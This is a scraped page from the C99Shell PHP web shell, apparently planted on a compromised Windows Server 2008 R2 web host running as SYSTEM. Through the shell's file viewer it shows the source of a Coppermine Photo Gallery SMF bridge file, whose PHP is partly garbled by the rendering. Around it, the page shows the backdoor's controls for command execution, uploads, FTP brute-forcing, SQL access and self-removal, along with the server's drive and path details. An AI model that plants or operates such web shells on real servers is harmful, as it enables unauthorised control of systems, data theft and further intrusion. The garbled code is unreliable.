!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\bridge\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     smf10.inc.php (9.14 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/bridge/smf10.inc.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

// Switch that allows overriding the bridge manager with hard-coded values
define('USE_BRIDGEMGR'1);

require_once 
'bridge/udb_base.inc.php';

if (!
USE_BRIDGEMGR) {
        require_once(
'../smf/SSI.php');
        
$boardurl 'http://www.mysite.com/board';
} else {
        require_once(
$BRIDGE['relative_path_to_config_file'] . 'SSI.php');
}


class 
cpg_udb extends core_udb {

        function 
cpg_udb()
        {
                global 
$BRIDGE$CONFIG$boardurl$db_prefix$db_connection$db_server$db_name$db_user$user_settings;

                
$this->use_post_based_groups $BRIDGE['use_post_based_groups'];
                
$this->boardurl $boardurl;
                
$this->multigroups 1;
                
$this->group_overrride 1;


                
// Board table names
                
$this->table = array(
                        
'users' => 'members',
                        
'groups' => 'membergroups',
                );

                
// Database connection settings
                
$this->db = array(
                        
'name' => $db_name,
                        
'host' => $db_server $db_server 'localhost',
                        
'user' => $db_user,
                        
'prefix' =>$db_prefix
                
);

        
// Derived full table names
        
if (strpos($db_prefix'.') === false) {
            
$this->usertable '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['users'];
            
$this->groupstable =  '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['groups'];
        } else {
            
$this->usertable $this->db['prefix'] . $this->table['users'];
            
$this->groupstable $this->db['prefix'] . $this->table['groups'];
        }

                
// Table field names
                
$this->field = array(
                        
'username' => 'memberName'// name of 'username' field in users table
                        
'user_id' => 'ID_MEMBER'// name of 'id' field in users table
                        
'password' => 'passwd'// name of the password field in the users table
                        
'email' => 'emailAddress'// name of 'email' field in users table
                        
'regdate' => 'dateRegistered'// name of 'registered' field in users table
                        
'lastvisit' => 'UNIX_TIMESTAMP(lastLogin)'// last time user logged in
                        
'active' => 'is_activated'// is user account active?
                        
'location' => 'location'// name of 'location' field in users table
                        
'website' => 'websiteUrl'// name of 'website' field in users table
                        
'usertbl_group_id' => 'ID_POST_GROUP'// name of 'group id' field in users table
                        
'grouptbl_group_id' => 'ID_GROUP'// name of 'group id' field in groups table
                        
'grouptbl_group_name' => 'groupName' // name of 'group name' field in groups table
                
);

                
// Pages to redirect to
                
$this->page = array(
                        
'register' => '/index.php?action=register',
                        
'editusers' => '/index.php?action=mlist',
                        
'edituserprofile' => '/index.php?action=profile;u='
                
);

                
// Group ids - admin and guest only.
                
$this->admingroups = array($this->use_post_based_groups 101 1);
                
$this->guestgroup $this->use_post_based_groups 3;

                
// Connect to db - or supply a connection id to be used instead of making own connection.
                
$this->connect($db_connection);
        }

        
// overriding authenticate() as we can let SMF do this all for us.
        
function authenticate()
        {
                global 
$USER_DATA$user_settings;

                if (!
$user_settings){
                        
$this->load_guest_data();
                } else {

                        
$row = array(
                                
'id' => $user_settings['ID_MEMBER'],
                                
'username' => $user_settings['memberName'],
                                
'group_id' => $user_settings['ID_GROUP']
                        );

                        
$this->load_user_data($row);
                }

                
$user_group_set '(' implode(','$USER_DATA['groups']) . ')';

                
$USER_DATA array_merge($USER_DATA$this->get_user_data($USER_DATA['groups'][0], $USER_DATA['groups'], $this->guestgroup));

                 
$USER_DATA['can_see_all_albums'] = $USER_DATA['has_admin_access'] = array_intersect($USER_DATA['groups'],$this->admingroups) ? 0;

                
// avoids a template error
                
if (!$USER_DATA['user_id']) $USER_DATA['can_create_albums'] = 0;

                
// For error checking
                
$CONFIG['TABLE_USERS'] = '**ERROR**';

                
define('USER_ID'$USER_DATA['user_id']);
                
define('USER_NAME'addslashes($USER_DATA['user_name']));
                
define('USER_GROUP'$USER_DATA['group_name']);
                
define('USER_GROUP_SET'$user_group_set);
                
define('USER_IS_ADMIN'$USER_DATA['has_admin_access']);
                
define('USER_CAN_SEND_ECARDS', (int)$USER_DATA['can_send_ecards']);
                
define('USER_CAN_RATE_PICTURES', (int)$USER_DATA['can_rate_pictures']);
                
define('USER_CAN_POST_COMMENTS', (int)$USER_DATA['can_post_comments']);
                
define('USER_CAN_UPLOAD_PICTURES', (int)$USER_DATA['can_upload_pictures']);
                
define('USER_CAN_CREATE_ALBUMS', (int)$USER_DATA['can_create_albums']);
                
define('USER_UPLOAD_FORM', (int)$USER_DATA['upload_form_config']);
                
define('CUSTOMIZE_UPLOAD_FORM', (int)$USER_DATA['custom_user_upload']);
                
define('NUM_FILE_BOXES', (int)$USER_DATA['num_file_upload']);
                
define('NUM_URI_BOXES', (int)$USER_DATA['num_URI_upload']);

                
$this->session_update();

        }

        function 
get_groups($row)
        {
                global 
$user_settings;

                
$i $this->use_post_based_groups 100 0;
                
$data = array();
                
                if (
$user_settings['ID_GROUP'] == 0){
                        
$data[0] = 2;
                } else {
                        
$data[0] = $user_settings['ID_GROUP'] + $i;
                }

                if (
$user_settings['additionalGroups']){

                        
$groups explode(','$user_settings['additionalGroups']);

                        foreach (
$groups as $id => $group){
                                   
//$data[$id] = $group+$i; This was overwriting the primary group
                                
$data[] = $group+$i;  //appends additionalGroups to the primary group.
                        
}
                }

                if (
$this->use_post_based_groups$data[] = $user_settings['ID_POST_GROUP'] + $i;

                return 
$data;
        }

        function 
collect_groups()
        {
                
// Use this version to exclude true post based groups
                //$sql ="SELECT * FROM {$this->groupstable} WHERE minposts=-1";

                // Use this version to include all SMF groups
                
$sql ="SELECT * FROM {$this->groupstable}";

                
$result cpg_db_query($sql$this->link_id);

                
$udb_groups = array(1=>'Guests'2=>'Registered');

                while (
$row mysql_fetch_assoc($result))
                {
                        
$udb_groups[$row[$this->field['grouptbl_group_id']]+100] = utf_ucfirst(utf_strtolower($row[$this->field['grouptbl_group_name']]));
                }

                return 
$udb_groups;
        }

        function 
login_page()
        {
                global 
$CONFIG;

                
// silly workaround for SMF's redirect check...
                
$_SESSION['old_url'] = $CONFIG['site_url'] . '?board=redirect';
                
$this->redirect('/index.php?action=login');
        }

        function 
logout_page()
        {
                global 
$CONFIG;

                
// this is a wee bit messy like....
                
ob_start();
                
ssi_logout($CONFIG['site_url']);
                
preg_match('/<a href="(.*)">/'ob_get_clean(), $matches);
                
$this->boardurl '';
        
$this->redirect($matches[1]);
        }

    function 
view_users()
    {
        
$this->redirect($this->page['editusers']);
    }
    
    function 
view_profile() {}
}


// and go !
$cpg_udb = new cpg_udb;
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--